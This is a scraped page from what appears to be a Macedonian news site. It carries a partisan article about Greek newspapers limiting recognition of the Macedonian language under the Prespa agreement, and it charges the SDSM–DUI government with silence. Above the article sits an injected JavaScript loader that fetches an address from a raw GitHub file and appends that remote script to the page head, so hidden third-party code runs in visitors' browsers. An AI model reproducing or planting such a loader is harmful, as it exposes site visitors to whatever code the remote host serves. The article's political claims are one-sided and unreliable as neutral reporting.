;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Грчки медиуми го негираат македонскиот јазик - Владата на СДСМ и ДУИ молчи - Антропол
АктуелноИнтернационално

Грчки медиуми го негираат македонскиот јазик – Владата на СДСМ и ДУИ молчи

Грчкиот весник Неа Флорина објавува дека Грција со договорот од Нивици прифатила постоење на македонски јазик, но само во границите на Македонија како што пишува овој грчки весник.

Уште еден грчки весник Метроспорт го објавува истото тврдејќи дека македонски јазик не е признат од земјите од светот, а Скопје во границите на државата народот може да се употребува јазик каков ќе си го нарекуваат.

И двата весници пренесуваат изјава од обвинител од Лерин. „Преспаснкиот договор признава македонски јазик, но само во границите на Македонија, но тоа не значи признавање на македонски јазик во Грција, или во другите држави, пишуваат двата грчки весници.“

Весникот Неа Флорина излезе со наслов “Кочница за планот за македонски јазик”.

Очигледно е дека стравот на Македонците се остварува, сега кога амбасадите на САД и Германија во земјава притискаат уставни измени со цел внесување на Бугарите во македонскиот устав, а опозициската ВМРО-ДПМНЕ ретерира од сопствените ставови со што отворањето на уставот го прави поизвесно, грчките медиуми започнаа кампања со негирање на македонскиот јазик, додека владата на СДСМ и ДУИ го премолчува сето ова.

Останува да видиме дали ќе продолжи анти-македонската политика на земјите членки на Европската унија за сметка на интеграциските процеси и продажбата на сопствената држава од страна на актуелната власт додека се газат која основните човекови права на македонскиот народ?